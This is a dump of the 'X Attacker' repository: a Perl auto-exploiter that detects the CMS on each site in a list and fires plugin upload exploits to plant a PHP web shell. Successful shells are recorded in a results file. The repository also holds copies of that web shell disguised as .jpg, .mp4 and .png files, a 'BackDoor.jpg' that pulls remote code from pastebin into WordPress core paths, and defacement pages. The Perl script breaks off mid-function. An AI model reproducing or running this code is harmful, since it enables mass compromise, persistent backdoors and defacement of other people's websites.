├── index.jpg
├── XAttacker.html
├── XAttacker.txt
├── XAttacker.html.j
├── Jattack.rar
├── XAttacker.gif
├── XAttacker.zip
├── XAttackerevs.zip
├── wpmobiledetectorshellonline.zip
├── BackDoor.jpg
├── XAttacker.jpg
├── XAttacker.php.mp4
├── XAttacker.php.png
├── XAttacker.phP3
├── XAttacker.php
├── XAttacker.php.php.j
├── nvn_extra_add.php
├── README.md
└── XAttacker.pl


/index.jpg:
--------------------------------------------------------------------------------
1 | HaCKeD BY Mohamed Riahi


--------------------------------------------------------------------------------
/XAttacker.html:
--------------------------------------------------------------------------------
1 | HaCKeD BY Mohamed Riahi


--------------------------------------------------------------------------------
/XAttacker.txt:
--------------------------------------------------------------------------------
1 | HaCKeD BY Mohamed Riahi


--------------------------------------------------------------------------------
/XAttacker.html.j:
--------------------------------------------------------------------------------
1 | HaCKeD BY Mohamed Riahi


--------------------------------------------------------------------------------
/Jattack.rar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/alienwithin/XAttacker/master/Jattack.rar


--------------------------------------------------------------------------------
/XAttacker.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/alienwithin/XAttacker/master/XAttacker.gif


--------------------------------------------------------------------------------
/XAttacker.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/alienwithin/XAttacker/master/XAttacker.zip


--------------------------------------------------------------------------------
/XAttackerevs.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/alienwithin/XAttacker/master/XAttackerevs.zip


--------------------------------------------------------------------------------
/wpmobiledetectorshellonline.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/alienwithin/XAttacker/master/wpmobiledetectorshellonline.zip


--------------------------------------------------------------------------------
/BackDoor.jpg:
--------------------------------------------------------------------------------
 1 | <?php
 2 | function http_get($url){
 3 | 	$im = curl_init($url);
 4 | 	curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
 5 | 	curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
 6 | 	curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
 7 | 	curl_setopt($im, CURLOPT_HEADER, 0);
 8 | 	return curl_exec($im);
 9 | 	curl_close($im);
10 | }
11 | $check = $_SERVER['DOCUMENT_ROOT'] . "/wp-includes/wp-footer.php" ;
12 | $text = http_get('https://pastebin.com/raw/wDFRMJrx');
13 | $open = fopen($check, 'w');
14 | fwrite($open, $text);
15 | fclose($open);
16 | if(file_exists($check)){
17 |     echo $check."</br>";
18 | }else 
19 |   echo "not exits";
20 | echo "done .\n " ;
21 | $check2 = $_SERVER['DOCUMENT_ROOT'] . "/wp-admin/shapes.php" ;
22 | $text2 = http_get('https://pastebin.com/raw/wDFRMJrx');
23 | $open2 = fopen($check2, 'w');
24 | fwrite($open2, $text2);
25 | fclose($open2);
26 | if(file_exists($check2)){
27 |     echo $check2."</br>";
28 | }else 
29 |   echo "not exits2";
30 | echo "done2 .\n " ;
31 | 
32 | 
33 | ?>
34 | 


--------------------------------------------------------------------------------
/XAttacker.jpg:
--------------------------------------------------------------------------------
 1 | <html>
 2 | <!-- X Attacker v1.5 -->
 3 | </html>
 4 | 
 5 | <?php
 6 | 
 7 | error_reporting(0);
 8 | set_time_limit(0);
 9 | 
10 | if($_GET['X']=="Attacker"){
11 | echo "<center><b>Uname:".php_uname()."<br></b>"; 
12 | echo '<font color="black" size="4">';
13 | if(isset($_POST['Submit'])){
14 |     $filedir = ""; 
15 |     $maxfile = '2000000';
16 |     $mode = '0644';
17 |     $userfile_name = $_FILES['image']['name'];
18 |     $userfile_tmp = $_FILES['image']['tmp_name'];
19 |     if(isset($_FILES['image']['name'])) {
20 |         $qx = $filedir.$userfile_name;
21 |         @move_uploaded_file($userfile_tmp, $qx);
22 |         @chmod ($qx, octdec($mode));
23 | echo" <a href=$userfile_name><center><b>Sucess Upload :D ==> $userfile_name</b></center></a>";
24 | }
25 | }
26 | else{
27 | echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>';
28 | }
29 | echo '</center></font>';
30 | 
31 | }
32 | ?>


--------------------------------------------------------------------------------
/XAttacker.php.mp4:
--------------------------------------------------------------------------------
 1 | <html>
 2 | <!-- X Attacker v1.5 -->
 3 | </html>
 4 | 
 5 | <?php
 6 | 
 7 | error_reporting(0);
 8 | set_time_limit(0);
 9 | 
10 | if($_GET['X']=="Attacker"){
11 | echo "<center><b>Uname:".php_uname()."<br></b>"; 
12 | echo '<font color="black" size="4">';
13 | if(isset($_POST['Submit'])){
14 |     $filedir = ""; 
15 |     $maxfile = '2000000';
16 |     $mode = '0644';
17 |     $userfile_name = $_FILES['image']['name'];
18 |     $userfile_tmp = $_FILES['image']['tmp_name'];
19 |     if(isset($_FILES['image']['name'])) {
20 |         $qx = $filedir.$userfile_name;
21 |         @move_uploaded_file($userfile_tmp, $qx);
22 |         @chmod ($qx, octdec($mode));
23 | echo" <a href=$userfile_name><center><b>Sucess Upload :D ==> $userfile_name</b></center></a>";
24 | }
25 | }
26 | else{
27 | echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>';
28 | }
29 | echo '</center></font>';
30 | 
31 | }
32 | ?>


--------------------------------------------------------------------------------
/XAttacker.php.png:
--------------------------------------------------------------------------------
 1 | <html>
 2 | <!-- X Attacker v1.5 -->
 3 | </html>
 4 | 
 5 | <?php
 6 | 
 7 | error_reporting(0);
 8 | set_time_limit(0);
 9 | 
10 | if($_GET['X']=="Attacker"){
11 | echo "<center><b>Uname:".php_uname()."<br></b>"; 
12 | echo '<font color="black" size="4">';
13 | if(isset($_POST['Submit'])){
14 |     $filedir = ""; 
15 |     $maxfile = '2000000';
16 |     $mode = '0644';
17 |     $userfile_name = $_FILES['image']['name'];
18 |     $userfile_tmp = $_FILES['image']['tmp_name'];
19 |     if(isset($_FILES['image']['name'])) {
20 |         $qx = $filedir.$userfile_name;
21 |         @move_uploaded_file($userfile_tmp, $qx);
22 |         @chmod ($qx, octdec($mode));
23 | echo" <a href=$userfile_name><center><b>Sucess Upload :D ==> $userfile_name</b></center></a>";
24 | }
25 | }
26 | else{
27 | echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>';
28 | }
29 | echo '</center></font>';
30 | 
31 | }
32 | ?>


--------------------------------------------------------------------------------
/XAttacker.phP3:
--------------------------------------------------------------------------------
 1 | <html>
 2 | <!-- X Attacker v1.5 -->
 3 | </html>
 4 | 
 5 | <?php
 6 | 
 7 | error_reporting(0);
 8 | set_time_limit(0);
 9 | 
10 | if($_GET['X']=="Attacker"){
11 | echo "<center><b>Uname:".php_uname()."<br></b>"; 
12 | echo '<font color="black" size="4">';
13 | if(isset($_POST['Submit'])){
14 |     $filedir = ""; 
15 |     $maxfile = '2000000';
16 |     $mode = '0644';
17 |     $userfile_name = $_FILES['image']['name'];
18 |     $userfile_tmp = $_FILES['image']['tmp_name'];
19 |     if(isset($_FILES['image']['name'])) {
20 |         $qx = $filedir.$userfile_name;
21 |         @move_uploaded_file($userfile_tmp, $qx);
22 |         @chmod ($qx, octdec($mode));
23 | echo" <a href=$userfile_name><center><b>Sucess Upload :D ==> $userfile_name</b></center></a>";
24 | }
25 | }
26 | else{
27 | echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>';
28 | }
29 | echo '</center></font>';
30 | 
31 | }
32 | ?>


--------------------------------------------------------------------------------
/XAttacker.php:
--------------------------------------------------------------------------------
 1 | <html>
 2 | <!-- X Attacker v1.5 -->
 3 | </html>
 4 | 
 5 | <?php
 6 | 
 7 | error_reporting(0);
 8 | set_time_limit(0);
 9 | 
10 | if($_GET['X']=="Attacker"){
11 | echo "<center><b>Uname:".php_uname()."<br></b>"; 
12 | echo '<font color="black" size="4">';
13 | if(isset($_POST['Submit'])){
14 |     $filedir = ""; 
15 |     $maxfile = '2000000';
16 |     $mode = '0644';
17 |     $userfile_name = $_FILES['image']['name'];
18 |     $userfile_tmp = $_FILES['image']['tmp_name'];
19 |     if(isset($_FILES['image']['name'])) {
20 |         $qx = $filedir.$userfile_name;
21 |         @move_uploaded_file($userfile_tmp, $qx);
22 |         @chmod ($qx, octdec($mode));
23 | echo" <a href=$userfile_name><center><b>Sucess Upload :D ==> $userfile_name</b></center></a>";
24 | }
25 | }
26 | else{
27 | echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>';
28 | }
29 | echo '</center></font>';
30 | 
31 | }
32 | ?>


--------------------------------------------------------------------------------
/XAttacker.php.php.j:
--------------------------------------------------------------------------------
 1 | <html>
 2 | <!-- X Attacker v1.5 -->
 3 | </html>
 4 | 
 5 | <?php
 6 | 
 7 | error_reporting(0);
 8 | set_time_limit(0);
 9 | 
10 | if($_GET['X']=="Attacker"){
11 | echo "<center><b>Uname:".php_uname()."<br></b>"; 
12 | echo '<font color="black" size="4">';
13 | if(isset($_POST['Submit'])){
14 |     $filedir = ""; 
15 |     $maxfile = '2000000';
16 |     $mode = '0644';
17 |     $userfile_name = $_FILES['image']['name'];
18 |     $userfile_tmp = $_FILES['image']['tmp_name'];
19 |     if(isset($_FILES['image']['name'])) {
20 |         $qx = $filedir.$userfile_name;
21 |         @move_uploaded_file($userfile_tmp, $qx);
22 |         @chmod ($qx, octdec($mode));
23 | echo" <a href=$userfile_name><center><b>Sucess Upload :D ==> $userfile_name</b></center></a>";
24 | }
25 | }
26 | else{
27 | echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>';
28 | }
29 | echo '</center></font>';
30 | 
31 | }
32 | ?>


--------------------------------------------------------------------------------
/nvn_extra_add.php:
--------------------------------------------------------------------------------
 1 | <html>
 2 | <!-- X Attacker v1.5 -->
 3 | </html>
 4 | 
 5 | <?php
 6 | 
 7 | error_reporting(0);
 8 | set_time_limit(0);
 9 | 
10 | if($_GET['X']=="Attacker"){
11 | echo "<center><b>Uname:".php_uname()."<br></b>"; 
12 | echo '<font color="black" size="4">';
13 | if(isset($_POST['Submit'])){
14 |     $filedir = ""; 
15 |     $maxfile = '2000000';
16 |     $mode = '0644';
17 |     $userfile_name = $_FILES['image']['name'];
18 |     $userfile_tmp = $_FILES['image']['tmp_name'];
19 |     if(isset($_FILES['image']['name'])) {
20 |         $qx = $filedir.$userfile_name;
21 |         @move_uploaded_file($userfile_tmp, $qx);
22 |         @chmod ($qx, octdec($mode));
23 | echo" <a href=$userfile_name><center><b>Sucess Upload :D ==> $userfile_name</b></center></a>";
24 | }
25 | }
26 | else{
27 | echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>';
28 | }
29 | echo '</center></font>';
30 | 
31 | }
32 | ?>


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | <pre>
  2 | 
  3 |              .o oOOOOOOOo                                            OOOo
  4 |              Ob.OOOOOOOo  OOOo.      oOOo.                      .adOOOOOOO
  5 |              OboO"""""""""""".OOo. .oOOOOOo.    OOOo.oOOOOOo.."""""""""'OO
  6 |              OOP.oOOOOOOOOOOO "POOOOOOOOOOOo.   `"OOOOOOOOOP,OOOOOOOOOOOB'
  7 |              `O'OOOO'     `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO'    `OOOOo
  8 |              .OOOO'            `OOOOOOOOOOOOOOOOOOOOOOOOOO'            `OO
  9 |              OOOOO                 '"OOOOOOOOOOOOOOOO"`                oOO
 10 |             oOOOOOba.                .adOOOOOOOOOOba               .adOOOOo.
 11 |            oOOOOOOOOOOOOOba.    .adOOOOOOOOOO@^OOOOOOOba.     .adOOOOOOOOOOOO
 12 |           OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"`  '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
 13 |           "OOOO"       "YOoOOOOMOIONODOO"`  .   '"OOROAOPOEOOOoOY"     "OOO"
 14 |              Y           'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?'         :`
 15 |              :            .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO?
 16 |                           oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
 17 |                           '%o  OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
 18 |                                `$"  `OOOO' `O"Y ' `OOOO'  o
 19 |                                       OP"          : o
 20 |                        [ X Attacker v2.0 ][ Coded By Mohamed Riahi ]
 21 |                            [ Start At Tue Nov  7 12:30:48 2017 ]
 22 | </pre>
 23 | <h2>Installation</h2>
 24 | <code>git clone https://github.com/Moham3dRiahi/XAttacker.git</code><br><br>
 25 | <h2>X Attacker</h2>
 26 | 
 27 | X Attacker Tool ☣ Website Vulnerability Scanner & Auto Exploiter
 28 | <img src="https://i.imgur.com/DxZyQit.jpg" data-canonical-src="https://i.imgur.com/DxZyQit.jpg" style="max-width:100%;">
 29 | 
 30 | <b>[+] Auto Cms Detect
 31 | 
 32 | <b>[1] WordPress :<br>
 33 | 
 34 | [+] Adblock Blocker  <br>
 35 | [+] WP All Import <br>
 36 | [+] Blaze <br>
 37 | [+] Catpro <br>
 38 | [+] Cherry Plugin  
 39 | [+] Download Manager  
 40 | [+] Formcraft  
 41 | [+] Power Zoomer  
 42 | [+] Gravity Forms  
 43 | [+] Revslider Upload Shell  
 44 | [+] Revslider Dafece Ajax  
 45 | [+] Revslider Get Config  
 46 | [+] Showbiz  
 47 | [+] Simple Ads Manager  
 48 | [+] Slide Show Pro  
 49 | [+] WP Mobile Detector  
 50 | [+] Wysija  
 51 | [+] InBoundio Marketing  
 52 | [+] dzs-zoomsounds  
 53 | [+] Reflex Gallery  
 54 | [+] Creative Contact Form  
 55 | [+] Work The Flow File Upload  
 56 | [+] WP Job Manger  
 57 | [+] PHP Event Calendar  
 58 | [+] Synoptic  
 59 | [+] Wp Shop  
 60 | [+] Content Injection 
 61 | 
 62 | <b>[2] Joomla<br>
 63 | 
 64 | [+] Com Jce  
 65 | [+] Com Media  
 66 | [+] Com Jdownloads  
 67 | [+] Com Fabrik  
 68 | [+] Com Jdownloads Index  
 69 | [+] Com Foxcontact  
 70 | [+] Com Ads Manager  
 71 | [+] Com Blog  
 72 | [+] Com Users  
 73 | [+] Com Weblinks<br>
 74 | [+] mod_simplefileupload 
 75 | 
 76 | <b>[3] DruPal<br> 
 77 | 
 78 | [+] Add Admin
 79 | 
 80 | <b>[4] PrestaShop<br>
 81 | 
 82 | [+] columnadverts  
 83 | [+] soopamobile  
 84 | [+] soopabanners  
 85 | [+] Vtermslideshow  
 86 | [+] simpleslideshow  
 87 | [+] productpageadverts  
 88 | [+] homepageadvertise  
 89 | [+] homepageadvertise2  
 90 | [+] jro_homepageadvertise  
 91 | [+] attributewizardpro  
 92 | [+] 1attributewizardpro  
 93 | [+] AttributewizardproOLD  
 94 | [+] attributewizardpro_x  
 95 | [+] advancedslider  
 96 | [+] cartabandonmentpro  
 97 | [+] cartabandonmentproOld  
 98 | [+] videostab  
 99 | [+] wg24themeadministration  
100 | [+] fieldvmegamenu  
101 | [+] wdoptionpanel  
102 | [+] pk_flexmenu  
103 | [+] pk_vertflexmenu  
104 | [+] nvn_export_orders  
105 | [+] megamenu  
106 | [+] tdpsthemeoptionpanel  
107 | [+] psmodthemeoptionpanel  
108 | [+] masseditproduct
109 | 
110 | <b>[5] Lokomedia<br>
111 | 
112 | SQL injection
113 | 
114 | <h2>Video</h2>
115 | <a href="https://www.youtube.com/watch?v=EgqTsrWt2VU"><img src="https://i.imgur.com/5B96biH.png" style="max-width:100%;"></a>
116 | 
117 | <h2>Usage</h2>
118 | 
119 | <table>
120 | <thead>
121 | <tr>
122 | <th>Short Form</th>
123 | <th>Long Form</th>
124 | <th>Description</th>
125 | </tr>
126 | </thead>
127 | <tbody>
128 | <tr>
129 | <td>-l</td>
130 | <td>--list</td>
131 | <td>websites list</td>
132 | </tr>
133 | </tbody></table>
134 | <h2>Example</h2>
135 | <code>perl XAttacker.pl -l list.txt</code>
136 | <br><br><strong>for coloring in windows Add This Line</strong><br>
137 | <code>use Win32::Console::ANSI;</code>
138 | <br><img src="https://media.giphy.com/media/hVTXBi1FCdL0I/giphy.gif" data-canonical-src="https://media.giphy.com/media/hVTXBi1FCdL0I/giphy.gif" style="max-width:100%;">
139 | 
140 | <strong>⚠ Warning ⚠</strong><br>
141 | <strong>Don't forget update time every month in line 37</strong><br>
142 | <strong>Don't forget check online tools in line 1081 and 3256</strong><br>
143 | 
144 | <h2>Version</h2>
145 | <strong>Current version is 2.0</strong>
146 | <strong>What's New </strong>
147 | <p>• speed up<p>
148 | <p>• Bug fixes<p>
149 | 
150 | <strong>version 1.9</strong>
151 | <p>• Bug fixes<p>
152 | 


--------------------------------------------------------------------------------
/XAttacker.pl:
--------------------------------------------------------------------------------
   1 | #!/usr/bin/perl
   2 | 
   3 | #Coded By Mohamed Riahi 10/10/2017
   4 | #don't Change my Fucking Rights
   5 | 
   6 | #past here
   7 | use Getopt::Long;
   8 | use HTTP::Request;
   9 | use LWP::UserAgent;
  10 | use IO::Select;
  11 | use HTTP::Cookies;
  12 | use HTTP::Response;
  13 | use Term::ANSIColor;
  14 | use HTTP::Request::Common qw(POST);
  15 | use HTTP::Request::Common qw(GET);
  16 | use URI::URL;
  17 | use IO::Socket::INET;
  18 | my $ua = LWP::UserAgent->new;
  19 | $ua->timeout(10);
  20 | 
  21 | GetOptions(
  22 |     "l|list=s" => \$list,
  23 | );
  24 | 
  25 | unless ($list) { help(); }
  26 | 
  27 | 
  28 | sub help {
  29 | print q(
  30 | Usage:  perl XAttacker.pl -l list.txt
  31 | OPTIONS:
  32 |    -l   => websites list
  33 | );
  34 | exit;}
  35 | 
  36 | my $year = "2017";
  37 | my $month = "11";
  38 | my $datetime    = localtime;
  39 | 
  40 | system("title X Attacker v2.0");
  41 | if ($^O =~ /MSWin32/) {system("cls"); }else { system("clear"); }
  42 | print color('bold green');
  43 | 
  44 | $tmp="tmp";
  45 |     if (-e $tmp) 
  46 |     {
  47 |     }
  48 |     else
  49 |     {
  50 |         mkdir $tmp or die "Error creating directory: $tmp";
  51 |     }
  52 | 
  53 | $rez="Result";
  54 |     if (-e $rez) 
  55 |     {
  56 |     }
  57 |     else
  58 |     {
  59 |         mkdir $rez or die "Error creating directory: $rez";
  60 |     }
  61 | 
  62 | 
  63 | 
  64 | print q(
  65 |              .o oOOOOOOOo                                            OOOo
  66 |              Ob.OOOOOOOo  OOOo.      oOOo.                      .adOOOOOOO
  67 |              OboO"""""""""""".OOo. .oOOOOOo.    OOOo.oOOOOOo.."""""""""'OO
  68 |              OOP.oOOOOOOOOOOO "POOOOOOOOOOOo.   `"OOOOOOOOOP,OOOOOOOOOOOB'
  69 |              `O'OOOO'     `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO'    `OOOOo
  70 |              .OOOO'            `OOOOOOOOOOOOOOOOOOOOOOOOOO'            `OO
  71 |              OOOOO                 '"OOOOOOOOOOOOOOOO"`                oOO
  72 |             oOOOOOba.                .adOOOOOOOOOOba               .adOOOOo.
  73 |            oOOOOOOOOOOOOOba.    .adOOOOOOOOOO@^OOOOOOOba.     .adOOOOOOOOOOOO
  74 |           OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"`  '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
  75 |           "OOOO"       "YOoOOOOMOIONODOO"`  .   '"OOROAOPOEOOOoOY"     "OOO"
  76 |              Y           'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?'         :`
  77 |              :            .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO?          
  78 |                           oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
  79 |                           '%o  OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
  80 |                                `$"  `OOOO' `O"Y ' `OOOO'  o              
  81 |                                       OP"          : o                                 
  82 | );
  83 | 
  84 | print color('reset');
  85 | print "                       ";
  86 | print colored ("[ X Attacker v2.0 ]",'white on_red');  
  87 | print colored ("[ Coded By Mohamed Riahi ]\n",'white on_red');
  88 | print "                           ";
  89 | print colored ("[ Start At $datetime ]",'white on_red'),"\n\n";
  90 | 
  91 | $a = 0;
  92 | open (THETARGET, "<$list") || die "[-] Can't open the file";
  93 | @TARGETS = <THETARGET>;
  94 | close THETARGET;
  95 | $link=$#TARGETS + 1;
  96 | 
  97 | 
  98 | print color("bold white"), "[+] Total sites : ";
  99 | print color("bold red"), "".scalar(@TARGETS)."\n\n";
 100 | print color('reset');
 101 | 
 102 | OUTER: foreach $site(@TARGETS){
 103 | chomp($site);
 104 | $a++;
 105 | cms();
 106 | }
 107 | 
 108 | ################ CMS DETCTER #####################
 109 | sub cms(){
 110 | $ua = LWP::UserAgent->new(keep_alive => 1);
 111 | $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
 112 | $ua->timeout (15);
 113 | $lokomedia = "$site/smiley/1.gif";
 114 | my $lokomediacms = $ua->get("$lokomedia")->content_type;
 115 | $loko = "$site/rss.xml";
 116 | my $lokomediacmstow = $ua->get("$loko")->content;
 117 | my $cms = $ua->get("$site")->content;
 118 | 
 119 | if($cms =~/<script type=\"text\/javascript\" src=\"\/media\/system\/js\/mootools.js\"><\/script>| \/media\/system\/js\/|com_content|Joomla!/) {
 120 | print color('bold white'),"\n[$a] $site - ";
 121 |     print color("bold green"), "Joomla\n\n";
 122 |     print color('reset');
 123 |     open(save, '>>tmp/joomla.txt');
 124 |     print save "$site\n";   
 125 |     close(save);
 126 |   comjce();
 127 |   comedia();
 128 |   comjdownloads();
 129 |   comfabrik();
 130 |   foxcontact();
 131 |   comadsmanager();
 132 |   comblog();
 133 |   comusers();
 134 |   comweblinks();
 135 |   mod_simplefileupload();
 136 | }
 137 | elsif($cms =~/wp-content|wordpress|xmlrpc.php/) {
 138 |     print color('bold white'),"\n[$a] $site - ";
 139 |     print color("bold green"), "WordPress\n\n"; 
 140 |     print color('reset'); 
 141 |     open(save, '>>tmp/Wordpress.txt');
 142 |     print save "$site\n"; 
 143 |     close(save);
 144 |     addblockblocker();
 145 |     blaze();
 146 |     catpro();
 147 |     cherry();
 148 |     downloadsmanager();
 149 |     formcraft();
 150 |     powerzoomer();
 151 |     gravityforms();
 152 |     revslider();
 153 |     getconfig();
 154 |     showbiz();
 155 |     ads();
 156 |     slideshowpro();
 157 |     wpmobiledetector();
 158 |     wysija();
 159 |     inboundiomarketing();
 160 |     dzszoomsounds();
 161 |     reflexgallery();
 162 |     sexycontactform();
 163 |     wtffu();
 164 |     wpjm();
 165 |     phpeventcalendar();
 166 |     synoptic();
 167 |     Wpshop();
 168 |     wpinjection();
 169 | }
 170 | elsif($cms =~/Drupal|drupal|sites\/all|drupal.org/) {
 171 |     print color('bold white'),"\n[$a] $site - ";
 172 |     print color("bold green"), "DruPal\n\n";
 173 |     print color('reset');
 174 |     open(save, '>>tmp/drupal.txt');
 175 |     print save "$site\n";   
 176 |     close(save);
 177 | drupal();
 178 | }
 179 | elsif($cms =~/Prestashop|prestashop/) {
 180 |     print color('bold white'),"\n[$a] $site - ";
 181 |     print color("bold green"), "Prestashop\n\n";
 182 |     print color('reset');
 183 |     open(save, '>>tmp/Prestashop.txt');
 184 |     print save "$site\n";   
 185 |     close(save);
 186 | 
 187 | 
 188 | 
 189 | columnadverts();
 190 | soopamobile();
 191 | soopabanners();
 192 | vtermslideshow();
 193 | simpleslideshow();
 194 | productpageadverts();
 195 | homepageadvertise();
 196 | homepageadvertise2();
 197 | jro_homepageadvertise();
 198 | attributewizardpro();
 199 | oneattributewizardpro();
 200 | attributewizardproOLD();
 201 | attributewizardpro_x();
 202 | advancedslider();
 203 | cartabandonmentpro();
 204 | cartabandonmentproOld();
 205 | videostab();
 206 | wg24themeadministration();
 207 | fieldvmegamenu();
 208 | wdoptionpanel();
 209 | pk_flexmenu();
 210 | pk_vertflexmenu();
 211 | nvn_export_orders();
 212 | megamenu();
 213 | tdpsthemeoptionpanel();
 214 | psmodthemeoptionpanel();
 215 | masseditproduct();
 216 | }
 217 | 
 218 | elsif($lokomediacms =~/image\/gif/) {
 219 | print color('bold white'),"\n[$a] $site - ";
 220 |     print color("bold green"), "Lokomedia\n\n";
 221 |     print color('reset');
 222 |     open(save, '>>tmp/lokomedia.txt');
 223 |     print save "$site\n";   
 224 |     close(save);
 225 |     lokomedia();
 226 | }
 227 | elsif($lokomediacmstow =~/lokomedia/) {
 228 | print color('bold white'),"\n[$a] $site - ";
 229 |     print color("bold green"), "Lokomedia\n\n";
 230 |     print color('reset');
 231 |     open(save, '>>tmp/lokomedia.txt');
 232 |     print save "$site\n";   
 233 |     close(save);
 234 |     lokomedia();
 235 | }
 236 | 
 237 | else{
 238 | print color('bold white'),"\n[$a] $site - ";
 239 |     print color("bold green"), "Unknown\n\n"; 
 240 |     open(save, '>>tmp/Unknown.txt');
 241 |     print color('reset'); 
 242 |     print save "$site\n";   
 243 |     close(save);
 244 | }
 245 | }
 246 | 
 247 | ################ Adblock Blocker #####################
 248 | sub addblockblocker(){
 249 | 
 250 | my $addblockurl = "$site/wp-admin/admin-ajax.php?action=getcountryuser&cs=2";
 251 | my $response = $ua->post($addblockurl, Content_Type => 'multipart/form-data', Content => [popimg => ["XAttacker.php"],]);
 252 | $addblockup="$site/wp-content/uploads/$year/$month/XAttacker.php?X=Attacker";
 253 | my $checkaddblock = $ua->get("$addblockup")->content;
 254 | 
 255 | if($checkaddblock =~/X Attacker/) {
 256 | print color('bold red'),"[";
 257 | print color('bold green'),"+";
 258 | print color('bold red'),"] ";
 259 | print color('bold white'),"Adblock Blocker";
 260 | print color('bold white')," ................... ";
 261 | print color('bold white'),"";
 262 | print color('bold green'),"VULN";
 263 | print color('bold white'),"\n";
 264 | print color('bold green')," [";
 265 | print color('bold red'),"+";
 266 | print color('bold green'),"] ";
 267 | print color('bold white'),"Shell Uploaded Successfully\n";
 268 | print color('bold white'),"  [Link] => $addblockup\n";
 269 | open (TEXT, '>>Result/Shells.txt');
 270 | print TEXT "$addblockup\n";
 271 | close (TEXT);
 272 | }else{
 273 | print color('bold red'),"[";
 274 | print color('bold green'),"+";
 275 | print color('bold red'),"] ";
 276 | print color('bold white'),"Adblock Blocker";
 277 | print color('bold white')," ................... ";
 278 | print color('bold red'),"NOt VULN";
 279 | print color('bold white'),"\n";}
 280 | }
 281 | 
 282 | ################ Blaze #####################
 283 | sub blaze(){
 284 | my $url = "$site/wp-admin/admin.php?page=blaze_manage";
 285 | my $blazeres = $ua->post($url, Content_Type => 'multipart/form-data', Content => [album_img => ["XAttacker.php"], task => 'blaze_add_new_album', album_name => '', album_desc => '',]);
 286 | 
 287 | if ($blazeres->content =~ /\/uploads\/blaze\/(.*?)\/big\/XAttacker.php/) {
 288 | $uploadfolder=$1;
 289 | $blazeup="$site/wp-content/uploads/blaze/$uploadfolder/big/XAttacker.php?X=Attacker";
 290 | print color('bold red'),"[";
 291 | print color('bold green'),"+";
 292 | print color('bold red'),"] ";
 293 | print color('bold white'),"Blaze";
 294 | print color('bold white')," ............................. ";
 295 | print color('bold white'),"";
 296 | print color('bold green'),"VULN";
 297 | print color('bold white'),"\n";
 298 | print color('bold green')," [";
 299 | print color('bold red'),"+";
 300 | print color('bold green'),"] ";
 301 | print color('bold white'),"Shell Uploaded Successfully\n";
 302 | print color('bold white'),"  [Link] => $blazeup\n";
 303 | open (TEXT, '>>Result/Shells.txt');
 304 | print TEXT "$blazeup\n";
 305 | close (TEXT);
 306 | }else{
 307 | print color('bold red'),"[";
 308 | print color('bold green'),"+";
 309 | print color('bold red'),"] ";
 310 | print color('bold white'),"Blaze";
 311 | print color('bold white')," ............................. ";
 312 | print color('bold red'),"NOt VULN";
 313 | print color('bold white'),"\n";
 314 | }
 315 | }
 316 | 
 317 | ################ Catpro #####################
 318 | sub catpro(){
 319 | 
 320 | my $url = "$site/wp-admin/admin.php?page=catpro_manage";
 321 | my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [album_img => ["XAttacker.php"], task => 'cpr_add_new_album', album_name => '', album_desc => '',]);
 322 | 
 323 | if ($response->content =~ /\/uploads\/catpro\/(.*?)\/big\/XAttacker.php/) {
 324 | $uploadfolder=$1;
 325 | $catproup="$site/wp-content/uploads/catpro/$uploadfolder/big/XAttacker.php?X=Attacker";
 326 | print color('bold red'),"[";
 327 | print color('bold green'),"+";
 328 | print color('bold red'),"] ";
 329 | print color('bold white'),"Catpro";
 330 | print color('bold white')," ............................ ";
 331 | print color('bold white'),"";
 332 | print color('bold green'),"VULN";
 333 | print color('bold white'),"\n";
 334 | print color('bold green')," [";
 335 | print color('bold red'),"+";
 336 | print color('bold green'),"] ";
 337 | print color('bold white'),"Shell Uploaded Successfully\n";
 338 | print color('bold white'),"  [Link] => $catproup\n";
 339 | open (TEXT, '>>Result/Shells.txt');
 340 | print TEXT "$catproup\n";
 341 | close (TEXT);
 342 | }else{
 343 | print color('bold red'),"[";
 344 | print color('bold green'),"+";
 345 | print color('bold red'),"] ";
 346 | print color('bold white'),"Catpro";
 347 | print color('bold white')," ............................ ";
 348 | print color('bold red'),"NOt VULN";
 349 | print color('bold white'),"\n";
 350 | }
 351 | }
 352 | 
 353 | 
 354 | ################ Cherry Plugin #####################
 355 | sub cherry(){
 356 | 
 357 | my $url = "$site/wp-content/plugins/cherry-plugin/admin/import-export/upload.php";
